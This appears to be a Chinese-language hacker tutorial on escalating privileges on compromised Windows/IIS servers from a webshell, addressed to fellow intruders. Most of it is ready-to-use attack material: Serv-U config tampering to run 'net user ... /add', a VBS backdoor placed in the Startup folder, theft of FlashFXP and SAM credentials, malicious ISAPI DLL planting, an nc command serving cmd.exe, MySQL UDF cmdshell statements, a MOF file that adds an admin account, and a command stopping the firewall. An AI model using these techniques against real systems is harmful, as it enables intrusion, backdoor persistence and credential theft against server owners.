提權

提權，顧名思義就是提高自己在服務器中的權限，就比如在windows中你本身登錄的用户是guest，然後通過提權後就變成超級管理員，擁有了管理Windows的所有權限。提權是黑客的專業名詞，一般用於網站入侵和系統入侵中。

如果服務器上有裝了pcanywhere服務端，管理員為了管理方便

也給了我們方便，到系統盤的Documents and Settings/All Us

ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地

破解就使用pcanywhere連接就可以了。

有很多小黑問我怎麼把webshell的iis user權限提升

一般服務器的管理都是本機設計完畢然後上傳到空間裏，

那麼就會用到ftp，服務器使用最多的就是servu

那麼我們就利用servu來提升權限

通過servu提升權限需要servu安裝目錄可寫～

好開始把，首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載

下來，然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋，

啓動servu添加了一個用户，設置為系統管理員，目錄C:\，具有可執行權限

然後去servu安裝目錄裏把ServUDaemon.ini更換服務器上的。

用我新建的用户和密碼連接～

好的，還是連上了

ftp

ftp＞open ip

Connected to ip.

220 Serv-U FTP Server v5.0.0.4 for WinSock ready...

User (ip:(none)): id //剛才添加的用户

331 User name okay, please send complete E-mail address as password.

Password:password //密碼

230 User logged in, proceed.

ftp＞ cd winnt //進入win2k的winnt目錄

250 Directory changed to /WINNT

ftp＞cd system32 //進入system32目錄

250 Directory changed to /WINNT/system32

ftp＞quote site exec net.exe user rover rover1234 /add //利用系統的net.exe

文件加用户。

如果提示沒有權限，那我們就

把後門（server.exe） 傳他system32目錄

然後寫一個VBs腳本

setwshshell=createobject ("wscript.shell")

a=wshshell.run ("cmd.exe /c net user user pass /add",0)

b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)

b=wshshell.run ("cmd.exe /c server.exe",0)

存為xx.vbe

這個腳本的作用是建立user用户密碼為pass

並且提升為管理員

然後執行system32目錄下的server.exe

把這個教本傳他 C:\Documents and Settings\All Users\「開始」菜單\程序\啓動

目錄

這樣管理員只要一登陸就會執行那個教本.

接下來就是等了.等他登陸.

就是先檢查有什麼系統服務，或者隨系統啓動自動啓動的程序和管理員經常使用的軟件， 比如諾頓，VAdministrator，金山，瑞星,WinRAR甚至QQ之類的，是否可以寫，如果可以就修改其程序， 綁定一個批處理或者VBS，然後還是等待服務器重啓。

查找conn和config ,pass這類型的文件看能否得到sa或者mysql的相關密碼，可能會有所

收穫等等。

使用Flashfxp也能提升權限，但是成功率就看你自己的運氣了

首先找到FlashFXP文件夾，打開(編輯)Sites. dat，這個文件這是什麼東西密碼和用户名，

而且密碼是加了密的。 如果我把這些文件copy回本地也就是我的計算機中，替換我本地的相應文件。然後會發現 打開flashfxp在站點中打開站點管理器一樣。又可以添加N多肉雞啦～～嘻嘻～

唔？？不對啊，是來提升權限的啊，暈，接着來別半途而廢。

大家看看對方管理員的這站點管理器，有用户名和密碼，密碼是星號的。經過用xp星號密碼查看器查看，然後和Sites.dat中加密了密碼做比較發現並未加密而是查到的密碼是明文顯示， 然後最終把這個網站管理員的密碼從這堆東西中找

出來。那麼下一步就可以鏈接這些新的服務器啦～～

經過測試只要把含有密碼和用户名的Sites.dat文件替換到本地相應的文件就可以在本地

還原對方管理員的各個站點的密碼。

WIN2K+IIS5.0默認情況下應用程序保護選項是"中（共用的）"，這時IIS加載isapi是用的

iwam_computername用户身份執行。

但默認情況下WIN2K+IIS5對於一些特殊isapi又要以system身份加載。win2k+iis5 、

win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的文件名，並且沒有做目錄限制，

以SYSTEM權限加載的isapi有：

1、idq.dll

2、 httpext.dll

3、 httpodbc.dll

4、 ssinc.dll

5、 msw3prt.dll

6、 author.dll

7、 admin.dll

8、 shtml.dll

9、 sspifilt.dll

10、compfilt.dll

11、pwsdata.dll

12、md5filt.dll

13、fpexedll.dll

所以利用這很容易得到SYSTEM權限。並且判斷文件名的時候有個bug，比如請求/scripts/test%81%5cssinc.dll也將會認為是請求的ssinc.dll,就是分離文件路徑的時候沒有考慮到雙字節的 遠東版問題。ssinc.dll在處理包含文件路徑的時候也有一個問題，就是"/"、"\"只識別了一個 "/"，所以如果請求裏面使用"\"，就會錯誤的處理包含文件路徑，有可能泄露東西或者出現權限 漏洞，這種漏洞很多別的地方（ php、asp等）也還存在。

加載這些isapi不是單以文件名做依據了，而是加了路徑，應該是修正了此問題。

一般默認情況下是：

1、idq.dlld:\winnt\system32\idq.dll

2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll

3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll

4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll

5、 msw3prt.dll d:\winnt\system32\msw3prt.dll

6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll

7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll

8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll

9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll

10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll

11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll

12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll

13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll

正常情況下這些路徑都guest不能寫,但如果配置不好，這些路徑iis user能夠寫了就一樣可以提升權限了

可以把ISAPIHack.dll上傳到IIS的可執行目錄，文件名可叫ssinc.dll或者admin.dll等（上面列的13個文件名之一）。

然後等待IIS重啓加載此dll，就可以獲得權限了

下載系統的 %windir%\repair\sam.*（WinNT 4下是sam._ 而Windows 2000下是sam）文件，

然後用L0pht等軟件進行破解，只要能拿到，肯花時間，就一定可以破解。

PipeUpAdmin（Windows 2000下）, 在本機運行可以把當前用户賬號加入管理員組。普通用户和Guests組用户都可以成功運行。

Serv-u Ftp Server 本地權限提升漏洞：

很多主機的C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個子目錄Documents沒有設置權限，導致可以在這個目錄上傳並運行Exp. 直接上傳了serv-u local exploit 和nc, 並且把serv-u的本地提升權限的名字命名為su.exe 文件就放在C:\Documents and Settings\All Users\ Documents, 然後我們用su.exe直接建立用户,也可以反彈一個shell過來的。

具體命令：

建立用户: serv-u.exe "cmd"

＞USER xl

＞PASS 111111

反彈shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

udf提權。利用條件：root權限的mysql賬號密碼。提權方法：具體語句如下：

create function cmdshell returns string soname 'udf.dll';

select cmdshell(’net user iis_user 123 /add’);

select cmdshell(’net localgroup administrators iis_user /add’);

select cmdshell(’regedit /s d:\web\3389.reg’);

drop function cmdshell;

select cmdshell(’netstat -an’);

mof提權。

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter

{

EventNamespace = "Root\\Cimv2";

Name = "filtP2";

Query = "Select * From __InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = "consPCSV2";

ScriptingEngine = "JScript";

ScriptText =

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

關閉防火牆服務 net stop "Windows Firewall/Internet Connection Sharing (ICS)"

以上保存為xxx.mof

1.找個可寫目錄，上傳mof文件

2.執行sql

select load_file('C:\\RECYCLER\\nullevt.mof') into

dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';